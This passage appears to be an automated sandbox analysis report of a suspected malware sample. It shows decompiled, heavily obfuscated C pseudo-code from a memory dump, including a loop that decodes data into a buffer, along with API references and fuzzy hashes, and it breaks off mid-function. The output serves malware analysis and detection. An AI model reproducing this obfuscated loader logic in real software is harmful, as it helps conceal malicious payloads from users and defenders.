                                                                                                                                                                                                                                                                            				_t700 = _t702 - 0x5c;
                                                                                                                                                                                                                                                                            				_t700[0x12] = _t700[0x1f] ^ 0x000003e2;
                                                                                                                                                                                                                                                                            				_t700[0x16] = _t700[0x1a] ^ 0x000026e5;
                                                                                                                                                                                                                                                                            				_t700[0xd] = _t700[0x1b] ^ 0x0000000a;
                                                                                                                                                                                                                                                                            				_t700[0xf] = _t700[0x1d] - 0x25a0;
                                                                                                                                                                                                                                                                            				_t700[0x11] = _t700[0x1e] + 0xe7;
                                                                                                                                                                                                                                                                            				_t700[0x14] = _t700[0x1c] ^ 0x000026d4;
                                                                                                                                                                                                                                                                            				_t700[0x15] = _t700[0x1d] + 0x29a;
                                                                                                                                                                                                                                                                            				_t700[0xe] = _t700[0x1a] + 0xd4;
                                                                                                                                                                                                                                                                            				if(_t700[0x15] > _t700[0x16] + 0x2687) {
                                                                                                                                                                                                                                                                            					if(_t700[0x16] == _t700[0x12] - 0x181) {
                                                                                                                                                                                                                                                                            						_t461 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t583 =  *0x40d404; // 0x1
                                                                                                                                                                                                                                                                            						__eflags = _t700[0x12] - (_t583 ^  *(_t461 + 0x28)) * 0x2565;
                                                                                                                                                                                                                                                                            						if(_t700[0x12] > (_t583 ^  *(_t461 + 0x28)) * 0x2565) {
                                                                                                                                                                                                                                                                            							_t700[0xc] =  *(_t700[0x19] + 0xbadbf9);
                                                                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                                                                            								_t587 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            								__eflags = _t700[0xc] - ( *(_t587 + 0x10c) | 0x000027b9);
                                                                                                                                                                                                                                                                            								if(_t700[0xc] == ( *(_t587 + 0x10c) | 0x000027b9)) {
                                                                                                                                                                                                                                                                            									goto L30;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t700[0xb] =  *(_t700[0x19] + 0xbadc39);
                                                                                                                                                                                                                                                                            								while(1) {
                                                                                                                                                                                                                                                                            									__eflags = _t700[0xb] - _t700[0x14] - 0x2622;
                                                                                                                                                                                                                                                                            									if(_t700[0xb] < _t700[0x14] - 0x2622) {
                                                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_t593 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            									 *(_t700 - 0x4c) = _t700[0xe] ^  *(_t593 + 0x108) ^ 0x00002506;
                                                                                                                                                                                                                                                                            									 *(_t700 - 0x48) = (_t700[0x11] ^  *(_t700[0x19] + 0xe0)) + 0x2565;
                                                                                                                                                                                                                                                                            									_t468 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            									 *(_t700 - 0x44) = _t700[0x16] *  *(_t468 + 0xbadc39);
                                                                                                                                                                                                                                                                            									GetModuleFileNameA( *(_t700 - 0x4c),  *(_t700 - 0x48),  *(_t700 - 0x44));
                                                                                                                                                                                                                                                                            									_t471 = _t700[0xb] + 2;
                                                                                                                                                                                                                                                                            									__eflags = _t471;
                                                                                                                                                                                                                                                                            									_t700[0xb] = _t471;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t592 = _t700[0xc] + 2;
                                                                                                                                                                                                                                                                            								__eflags = _t592;
                                                                                                                                                                                                                                                                            								_t700[0xc] = _t592;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_t353 = _t700[0x19];
                                                                                                                                                                                                                                                                            							__eflags =  *((intOrPtr*)(_t353 + 0xbadbc1)) - (_t700[0x14] & 0x000024c7);
                                                                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t353 + 0xbadbc1)) <= (_t700[0x14] & 0x000024c7)) {
                                                                                                                                                                                                                                                                            								__eflags =  *0x40d440 - _t700[0x11] + 0x2598 -  *(_t700[0x19] + 0xb4); // 0x0
                                                                                                                                                                                                                                                                            								if(__eflags > 0) {
                                                                                                                                                                                                                                                                            									_t357 = _t700[0x16] - _t700[0xd] -  *(_t700[0x19] + 0x10c) ^  *(_t700[0x19] + 0xe0);
                                                                                                                                                                                                                                                                            									__eflags = _t357;
                                                                                                                                                                                                                                                                            									 *(_t700[0x19] + 0xe0) = _t357;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                                                            								 *(_t700 - 0xc) = _t700[0x19];
                                                                                                                                                                                                                                                                            								 *((intOrPtr*)(_t700 - 8)) = (_t700[0x16] | _t700[0x15]) -  *((intOrPtr*)(_t700[0x19] + 0x30));
                                                                                                                                                                                                                                                                            								 *(_t700 - 4) = _t700[0x14] | _t700[0x15];
                                                                                                                                                                                                                                                                            								 *_t700 =  *(_t700[0x19] + 0xf4) | 0x00002598;
                                                                                                                                                                                                                                                                            								_t700[1] =  *(_t700[0x19] + 0xbadbe5) &  *(_t700[0x19] + 0x10c) ^ _t700[0x15];
                                                                                                                                                                                                                                                                            								_t700[2] = (_t700[0x14] & 0x00002796) + 0x26d4;
                                                                                                                                                                                                                                                                            								_t700[3] = _t700[0x12] - _t700[0xe] & 0x00002565;
                                                                                                                                                                                                                                                                            								_t700[0x14] = E00388960( *(_t700 - 0xc),  *((intOrPtr*)(_t700 - 8)),  *(_t700 - 4),  *_t700, _t700[1], _t700[2], _t700[3]);
                                                                                                                                                                                                                                                                            								 *(_t700 - 0x10) =  *(_t700[0x19] + 0xe4) | _t700[0xd];
                                                                                                                                                                                                                                                                            								GetModuleHandleA( *(_t700 - 0x10));
                                                                                                                                                                                                                                                                            								 *(_t700 - 0x28) = _t700[0x11] +  *0x40d40c;
                                                                                                                                                                                                                                                                            								 *(_t700 - 0x24) =  *(_t700[0x19] + 0xbadc39) * _t700[0x16];
                                                                                                                                                                                                                                                                            								 *(_t700 - 0x20) = _t700[0xf] * 0x00002598 ^ _t700[0x16];
                                                                                                                                                                                                                                                                            								 *(_t700 - 0x1c) =  *(_t700[0x19] + 0xb4) + 0x2598;
                                                                                                                                                                                                                                                                            								 *(_t700 - 0x18) = (_t700[0x16] |  *0x0040D4B4) * _t700[0x12];
                                                                                                                                                                                                                                                                            								_t374 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            								_t501 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            								_t238 = _t374 + 0x30; // 0x0
                                                                                                                                                                                                                                                                            								 *(_t700 - 0x14) =  *_t238 ^  *(_t501 + 0xbadbd5);
                                                                                                                                                                                                                                                                            								MultiByteToWideChar( *(_t700 - 0x28),  *(_t700 - 0x24),  *(_t700 - 0x20),  *(_t700 - 0x1c),  *(_t700 - 0x18),  *(_t700 - 0x14));
                                                                                                                                                                                                                                                                            								_t505 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            								_t700[0xf] =  *((intOrPtr*)(_t700[0x19] + 0x80)) +  *((intOrPtr*)(_t505 + 0xbadbb1)) - 0x27b9 + _t700[0xf];
                                                                                                                                                                                                                                                                            								_t383 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            								_t258 = _t383 + 0x98; // 0x0
                                                                                                                                                                                                                                                                            								 *(_t700 - 0x40) = _t700[0x15] + _t700[0x16] ^  *_t258;
                                                                                                                                                                                                                                                                            								 *(_t700 - 0x3c) = _t700[0x19];
                                                                                                                                                                                                                                                                            								 *(_t700 - 0x38) = _t700[0x11] ^ 0x00002687;
                                                                                                                                                                                                                                                                            								 *(_t700 - 0x34) = _t700[0x16] & _t700[0x15];
                                                                                                                                                                                                                                                                            								 *((intOrPtr*)(_t700 - 0x30)) = _t700[0xd] - _t700[0xe];
                                                                                                                                                                                                                                                                            								 *(_t700 - 0x2c) =  *(_t700[0x19] + 0xfc) ^  *(_t700[0x19] + 0xd0);
                                                                                                                                                                                                                                                                            								_push( *(_t700 - 0x2c));
                                                                                                                                                                                                                                                                            								_t700[0x16] = E00385F40( *(_t700 - 0x40),  *(_t700 - 0x3c),  *(_t700 - 0x38),  *(_t700 - 0x34),  *((intOrPtr*)(_t700 - 0x30)));
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                                                            						if( *(_t700[0x19] + 0xe0) < 0x178ba) {
                                                                                                                                                                                                                                                                            							_t638 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							_t30 = _t638 + 0xe0; // 0x6
                                                                                                                                                                                                                                                                            							_t394 =  *_t30 ^ 0x000ec987 ^  *(_t700[0x19] + 0x9c);
                                                                                                                                                                                                                                                                            							__eflags = _t394;
                                                                                                                                                                                                                                                                            							 *(_t700[0x19] + 0x9c) = _t394;
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_t574 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							 *(_t700[0x19] + 0xb4) =  *((intOrPtr*)(_t574 + 0xac)) + 0x0000ff99 |  *(_t700[0x19] + 0xb4);
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t640 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t640 + 0xb8)) <= 0x153b2) {
                                                                                                                                                                                                                                                                            							_t452 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							_t573 =  *0x40d47c; // 0x1212000
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t452 + 0xcc)) = _t573;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t643 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t41 = _t643 + 0x5c; // 0x1
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t700[0x19] + 0x118)) =  *(_t700[0x19] + 0xbadbe5) +  *_t41 + 0x6e28f3ff;
                                                                                                                                                                                                                                                                            						 *(_t700[0x19] + 0x7c) =  *(_t700[0x19] + 0xf4) + 0x1a1f58d1;
                                                                                                                                                                                                                                                                            						_t700[4] = _t700[0x11] + 0x132;
                                                                                                                                                                                                                                                                            						_t700[5] = _t700[0x16] ^ 0x00002622;
                                                                                                                                                                                                                                                                            						_t700[6] = _t700[0x15] - 0x2a2;
                                                                                                                                                                                                                                                                            						_t700[7] = 0x40d3a8;
                                                                                                                                                                                                                                                                            						_t700[8] = _t700[0xe] - 0xd4;
                                                                                                                                                                                                                                                                            						_t700[9] = _t700[0x14] + 0x2622;
                                                                                                                                                                                                                                                                            						_t700[0xa] = _t700[0xf] + 0x24c7;
                                                                                                                                                                                                                                                                            						_push(_t700[0xa]);
                                                                                                                                                                                                                                                                            						_t700[0x11] = E00371420(_t700[4], _t700[5], _t700[6], _t700[7], _t700[8], _t700[9]);
                                                                                                                                                                                                                                                                            						 *0x40d424 = 0x2e1;
                                                                                                                                                                                                                                                                            						_t653 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            						_t76 = _t653 + 0x64; // 0x658f6
                                                                                                                                                                                                                                                                            						if( *(_t700[0x19] + 0xe4) <  *_t76) {
                                                                                                                                                                                                                                                                            							_t449 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							_t80 = _t449 + 0x98; // 0x0
                                                                                                                                                                                                                                                                            							 *(_t700[0x19] + 0x7c) =  *(_t700[0x19] + 0x7c) -  *((intOrPtr*)(_t700[0x19] + 0xbadbb1)) -  *_t80 + 0x2e0;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						 *((intOrPtr*)(_t700[0x19] + 0xa8)) = 0x38a380;
                                                                                                                                                                                                                                                                            						_t700[0x10] = 0;
                                                                                                                                                                                                                                                                            						while(_t700[0x10] < 0xc06) {
                                                                                                                                                                                                                                                                            							_t700[0x13] =  *( *((intOrPtr*)(_t700[0x19] + 0xa8)) + _t700[0x10] * 4);
                                                                                                                                                                                                                                                                            							_t664 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							_t98 = _t664 + 0x7c; // 0xc4ec4ec5
                                                                                                                                                                                                                                                                            							_t700[0x13] = _t700[0x13] *  *_t98;
                                                                                                                                                                                                                                                                            							_t665 =  *0x40d474; // 0x1212000
                                                                                                                                                                                                                                                                            							 *((char*)(_t665 +  *0x40d444)) = _t700[0x13] >> 0x18;
                                                                                                                                                                                                                                                                            							_t416 =  *0x40d444; // 0x4b18c
                                                                                                                                                                                                                                                                            							 *0x40d444 = _t416 + 1;
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t700[0x19] + 0x8c)) =  *((intOrPtr*)(_t700[0x19] + 0x8c)) -  *0x0040D3BC +  *0x0040D48C - 0x63;
                                                                                                                                                                                                                                                                            							 *(_t700[0x19] + 0xbadbe5) =  *(_t700[0x19] + 0xbadbe5) -  *((intOrPtr*)(_t700[0x19] + 0x5c)) - 1;
                                                                                                                                                                                                                                                                            							_t428 =  *0x40d40c; // 0x658f6
                                                                                                                                                                                                                                                                            							_t548 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							_t676 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							 *(_t676 + 0x6c) = _t428 - 0x000658f6 ^  *(_t548 + 0x6c);
                                                                                                                                                                                                                                                                            							_t677 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							_t125 = _t677 + 0x98; // 0x0
                                                                                                                                                                                                                                                                            							_t552 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t552 + 0x98)) =  *_t125 -  *(_t700[0x19] + 0xb4) - 0x367796e2;
                                                                                                                                                                                                                                                                            							_t436 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							_t437 =  *0x40d4cc; // 0x40d3a8
                                                                                                                                                                                                                                                                            							 *(_t437 + 0xbadc31) =  *((intOrPtr*)(_t700[0x19] + 0xac)) - 0x00141358 |  *(_t436 + 0xbadc31);
                                                                                                                                                                                                                                                                            							 *((char*)( *((intOrPtr*)(_t700[0x19] + 0xcc)) +  *(_t700[0x19] + 0x9c))) = _t700[0x13] >> 0x10;
                                                                                                                                                                                                                                                                            							 *(_t700[0x19] + 0x9c) =  *(_t700[0x19] + 0x9c) + 1;
                                                                                                                                                                                                                                                                            							_t562 =  *0x40d474; // 0x1212000
                                                                                                                                                                                                                                                                            							 *((char*)(_t562 +  *(_t700[0x19] + 0x9c))) = _t700[0x13] >> 8;
                                                                                                                                                                                                                                                                            							 *(_t700[0x19] + 0x9c) =  *(_t700[0x19] + 0x9c) + 1;
                                                                                                                                                                                                                                                                            							 *((char*)( *((intOrPtr*)(_t700[0x19] + 0xcc)) +  *(_t700[0x19] + 0x9c))) = _t700[0x13];
                                                                                                                                                                                                                                                                            							 *(_t700[0x19] + 0x9c) =  *(_t700[0x19] + 0x9c) + 1;
                                                                                                                                                                                                                                                                            							_t700[0x10] = _t700[0x10] + 1;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						 *0x40d424 =  *(_t700[0x19] + 0xbadbe5) + 0x6e343d5a;
                                                                                                                                                                                                                                                                            						__eflags =  *0x0040D460 - 0xcb59;
                                                                                                                                                                                                                                                                            						if( *0x0040D460 <= 0xcb59) {
                                                                                                                                                                                                                                                                            							_t662 =  *(_t700[0x19] + 0x7c) ^ 0x000a216a;
                                                                                                                                                                                                                                                                            							__eflags = _t662;
                                                                                                                                                                                                                                                                            							 *(_t700[0x19] + 0x7c) = _t662;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						 *(_t700[0x19] + 0x7c) =  *(_t700[0x19] + 0xe0) ^ 0xbf5beec5 ^  *(_t700[0x19] + 0x7c);
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				L30:
                                                                                                                                                                                                                                                                            				__eflags =  &(_t700[0x17]);
                                                                                                                                                                                                                                                                            				return _t700[0x14] + 0x283a;
                                                                                                                                                                                                                                                                            			}







































                                                                                                                                                                                                                                                                            0x00385751
                                                                                                                                                                                                                                                                            0x00385764
                                                                                                                                                                                                                                                                            0x00385770
                                                                                                                                                                                                                                                                            0x00385779
                                                                                                                                                                                                                                                                            0x00385784
                                                                                                                                                                                                                                                                            0x00385790
                                                                                                                                                                                                                                                                            0x0038579c
                                                                                                                                                                                                                                                                            0x003857a7
                                                                                                                                                                                                                                                                            0x003857b3
                                                                                                                                                                                                                                                                            0x003857c2
                                                                                                                                                                                                                                                                            0x003857d3
                                                                                                                                                                                                                                                                            0x00385bda
                                                                                                                                                                                                                                                                            0x00385be0
                                                                                                                                                                                                                                                                            0x00385bf0
                                                                                                                                                                                                                                                                            0x00385bf3
                                                                                                                                                                                                                                                                            0x00385e65
                                                                                                                                                                                                                                                                            0x00385e73
                                                                                                                                                                                                                                                                            0x00385e7b
                                                                                                                                                                                                                                                                            0x00385e8d
                                                                                                                                                                                                                                                                            0x00385e90
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00385ea7
                                                                                                                                                                                                                                                                            0x00385eb5
                                                                                                                                                                                                                                                                            0x00385ebe
                                                                                                                                                                                                                                                                            0x00385ec1
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00385ecb
                                                                                                                                                                                                                                                                            0x00385ee0
                                                                                                                                                                                                                                                                            0x00385ef5
                                                                                                                                                                                                                                                                            0x00385f00
                                                                                                                                                                                                                                                                            0x00385f11
                                                                                                                                                                                                                                                                            0x00385f20
                                                                                                                                                                                                                                                                            0x00385eaf
                                                                                                                                                                                                                                                                            0x00385eaf
                                                                                                                                                                                                                                                                            0x00385eb2
                                                                                                                                                                                                                                                                            0x00385eb2
                                                                                                                                                                                                                                                                            0x00385e6d
                                                                                                                                                                                                                                                                            0x00385e6d
                                                                                                                                                                                                                                                                            0x00385e70
                                                                                                                                                                                                                                                                            0x00385e70
                                                                                                                                                                                                                                                                            0x00385bf9
                                                                                                                                                                                                                                                                            0x00385c09
                                                                                                                                                                                                                                                                            0x00385c0c
                                                                                                                                                                                                                                                                            0x00385c10
                                                                                                                                                                                                                                                                            0x00385e20
                                                                                                                                                                                                                                                                            0x00385e26
                                                                                                                                                                                                                                                                            0x00385e43
                                                                                                                                                                                                                                                                            0x00385e43
                                                                                                                                                                                                                                                                            0x00385e4c
                                                                                                                                                                                                                                                                            0x00385e4c
                                                                                                                                                                                                                                                                            0x00385c16
                                                                                                                                                                                                                                                                            0x00385c19
                                                                                                                                                                                                                                                                            0x00385c28
                                                                                                                                                                                                                                                                            0x00385c31
                                                                                                                                                                                                                                                                            0x00385c42
                                                                                                                                                                                                                                                                            0x00385c68
                                                                                                                                                                                                                                                                            0x00385c7a
                                                                                                                                                                                                                                                                            0x00385c88
                                                                                                                                                                                                                                                                            0x00385caf
                                                                                                                                                                                                                                                                            0x00385cc7
                                                                                                                                                                                                                                                                            0x00385cce
                                                                                                                                                                                                                                                                            0x00385cdd
                                                                                                                                                                                                                                                                            0x00385cf6
                                                                                                                                                                                                                                                                            0x00385d03
                                                                                                                                                                                                                                                                            0x00385d15
                                                                                                                                                                                                                                                                            0x00385d2d
                                                                                                                                                                                                                                                                            0x00385d38
                                                                                                                                                                                                                                                                            0x00385d3d
                                                                                                                                                                                                                                                                            0x00385d43
                                                                                                                                                                                                                                                                            0x00385d4a
                                                                                                                                                                                                                                                                            0x00385d65
                                                                                                                                                                                                                                                                            0x00385d7c
                                                                                                                                                                                                                                                                            0x00385d90
                                                                                                                                                                                                                                                                            0x00385d99
                                                                                                                                                                                                                                                                            0x00385d9e
                                                                                                                                                                                                                                                                            0x00385da4
                                                                                                                                                                                                                                                                            0x00385daa
                                                                                                                                                                                                                                                                            0x00385db6
                                                                                                                                                                                                                                                                            0x00385dbf
                                                                                                                                                                                                                                                                            0x00385dc8
                                                                                                                                                                                                                                                                            0x00385de6
                                                                                                                                                                                                                                                                            0x00385dec
                                                                                                                                                                                                                                                                            0x00385e09
                                                                                                                                                                                                                                                                            0x00385e09
                                                                                                                                                                                                                                                                            0x00385e52
                                                                                                                                                                                                                                                                            0x003857d9
                                                                                                                                                                                                                                                                            0x003857e6
                                                                                                                                                                                                                                                                            0x00385817
                                                                                                                                                                                                                                                                            0x0038581d
                                                                                                                                                                                                                                                                            0x0038582b
                                                                                                                                                                                                                                                                            0x0038582b
                                                                                                                                                                                                                                                                            0x00385834
                                                                                                                                                                                                                                                                            0x003857e8
                                                                                                                                                                                                                                                                            0x003857f0
                                                                                                                                                                                                                                                                            0x0038580f
                                                                                                                                                                                                                                                                            0x0038580f
                                                                                                                                                                                                                                                                            0x00385842
                                                                                                                                                                                                                                                                            0x00385853
                                                                                                                                                                                                                                                                            0x00385855
                                                                                                                                                                                                                                                                            0x0038585a
                                                                                                                                                                                                                                                                            0x00385860
                                                                                                                                                                                                                                                                            0x00385860
                                                                                                                                                                                                                                                                            0x00385874
                                                                                                                                                                                                                                                                            0x0038587a
                                                                                                                                                                                                                                                                            0x00385887
                                                                                                                                                                                                                                                                            0x0038589f
                                                                                                                                                                                                                                                                            0x003858aa
                                                                                                                                                                                                                                                                            0x003858b6
                                                                                                                                                                                                                                                                            0x003858c2
                                                                                                                                                                                                                                                                            0x003858c5
                                                                                                                                                                                                                                                                            0x003858d4
                                                                                                                                                                                                                                                                            0x003858e0
                                                                                                                                                                                                                                                                            0x003858ec
                                                                                                                                                                                                                                                                            0x003858f2
                                                                                                                                                                                                                                                                            0x00385913
                                                                                                                                                                                                                                                                            0x0038591c
                                                                                                                                                                                                                                                                            0x00385931
                                                                                                                                                                                                                                                                            0x0038593e
                                                                                                                                                                                                                                                                            0x00385941
                                                                                                                                                                                                                                                                            0x0038594d
                                                                                                                                                                                                                                                                            0x00385956
                                                                                                                                                                                                                                                                            0x0038596d
                                                                                                                                                                                                                                                                            0x0038596d
                                                                                                                                                                                                                                                                            0x00385973
                                                                                                                                                                                                                                                                            0x0038597d
                                                                                                                                                                                                                                                                            0x0038598f
                                                                                                                                                                                                                                                                            0x003859ab
                                                                                                                                                                                                                                                                            0x003859ae
                                                                                                                                                                                                                                                                            0x003859b7
                                                                                                                                                                                                                                                                            0x003859bb
                                                                                                                                                                                                                                                                            0x003859c4
                                                                                                                                                                                                                                                                            0x003859d0
                                                                                                                                                                                                                                                                            0x003859d2
                                                                                                                                                                                                                                                                            0x003859da
                                                                                                                                                                                                                                                                            0x00385a1e
                                                                                                                                                                                                                                                                            0x00385a48
                                                                                                                                                                                                                                                                            0x00385a54
                                                                                                                                                                                                                                                                            0x00385a5e
                                                                                                                                                                                                                                                                            0x00385a70
                                                                                                                                                                                                                                                                            0x00385a76
                                                                                                                                                                                                                                                                            0x00385a89
                                                                                                                                                                                                                                                                            0x00385a8f
                                                                                                                                                                                                                                                                            0x00385a97
                                                                                                                                                                                                                                                                            0x00385a9d
                                                                                                                                                                                                                                                                            0x00385ac3
                                                                                                                                                                                                                                                                            0x00385ad7
                                                                                                                                                                                                                                                                            0x00385adc
                                                                                                                                                                                                                                                                            0x00385afb
                                                                                                                                                                                                                                                                            0x00385b0d
                                                                                                                                                                                                                                                                            0x00385b22
                                                                                                                                                                                                                                                                            0x00385b28
                                                                                                                                                                                                                                                                            0x00385b3a
                                                                                                                                                                                                                                                                            0x00385b55
                                                                                                                                                                                                                                                                            0x00385b67
                                                                                                                                                                                                                                                                            0x0038598c
                                                                                                                                                                                                                                                                            0x0038598c
                                                                                                                                                                                                                                                                            0x00385b86
                                                                                                                                                                                                                                                                            0x00385b94
                                                                                                                                                                                                                                                                            0x00385b9e
                                                                                                                                                                                                                                                                            0x00385ba6
                                                                                                                                                                                                                                                                            0x00385ba6
                                                                                                                                                                                                                                                                            0x00385baf
                                                                                                                                                                                                                                                                            0x00385baf
                                                                                                                                                                                                                                                                            0x00385bca
                                                                                                                                                                                                                                                                            0x00385bca
                                                                                                                                                                                                                                                                            0x003857d3
                                                                                                                                                                                                                                                                            0x00385f2d
                                                                                                                                                                                                                                                                            0x00385f36
                                                                                                                                                                                                                                                                            0x00385f3c

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?), ref: 00385CCE
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.811704054.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811690404.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.811747442.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812148427.00000000003CC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812660058.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.812733384.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_370000_nhVJ8J5qOt.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: HandleModule
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                                                                                                                                                            • Opcode ID: fc8781454c8129bf2a781843cba32307106cd66479cd8b8ef3f3ffc5cc01bd99
                                                                                                                                                                                                                                                                            • Instruction ID: 9453dc2749ab471433060caf1ab1bc5b8356754a8fdca085c58f507db5da6b08
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fc8781454c8129bf2a781843cba32307106cd66479cd8b8ef3f3ffc5cc01bd99
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5442C374A00209CFDB48CF58C694AA9B7B2FF88304F548279E9199B796D735EC46CF84
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 97%
                                                                                                                                                                                                                                                                            			E003885E0(intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, signed int _a20) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                                                            				int* _v64;
                                                                                                                                                                                                                                                                            				char* _v68;
                                                                                                                                                                                                                                                                            				int _v72;
                                                                                                                                                                                                                                                                            				char* _v76;
                                                                                                                                                                                                                                                                            				int _v80;
                                                                                                                                                                                                                                                                            				short* _v84;
                                                                                                                                                                                                                                                                            				int _v88;
                                                                                                                                                                                                                                                                            				int _v92;
                                                                                                                                                                                                                                                                            				void* _v96;
                                                                                                                                                                                                                                                                            				void* _v100;
                                                                                                                                                                                                                                                                            				long _v104;
                                                                                                                                                                                                                                                                            				long _v108;
                                                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _v112;
                                                                                                                                                                                                                                                                            				long _v116;
                                                                                                                                                                                                                                                                            				long _v120;
                                                                                                                                                                                                                                                                            				CHAR* _v124;
                                                                                                                                                                                                                                                                            				intOrPtr _t173;
                                                                                                                                                                                                                                                                            				signed int* _t178;
                                                                                                                                                                                                                                                                            				signed int* _t207;
                                                                                                                                                                                                                                                                            				signed int* _t208;
                                                                                                                                                                                                                                                                            				signed int* _t209;
                                                                                                                                                                                                                                                                            				signed int* _t219;
                                                                                                                                                                                                                                                                            				signed int* _t232;
                                                                                                                                                                                                                                                                            				signed int* _t265;
                                                                                                                                                                                                                                                                            				signed int* _t279;
                                                                                                                                                                                                                                                                            				signed int* _t282;
                                                                                                                                                                                                                                                                            				signed int* _t320;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v12 = _a20 ^ 0x00000388;
                                                                                                                                                                                                                                                                            				_v20 = _a4 - 0x2801;
                                                                                                                                                                                                                                                                            				_v8 = _a20 - 0x161;
                                                                                                                                                                                                                                                                            				_v36 = _a8 + 0x174;
                                                                                                                                                                                                                                                                            				_v16 = _a20 - 0x122;
                                                                                                                                                                                                                                                                            				_v32 = _a12 ^ 0x00002801;
                                                                                                                                                                                                                                                                            				_v28 = _a20 - 0xc3;
                                                                                                                                                                                                                                                                            				_v24 = _a20 ^ 0x000001be;
                                                                                                                                                                                                                                                                            				if(_v24 == _v16 + 0x334) {
                                                                                                                                                                                                                                                                            					_v92 = _v20 ^ 0x1b4;
                                                                                                                                                                                                                                                                            					_v88 = _v8 - _v36 ^  *(_a16 + 0x98);
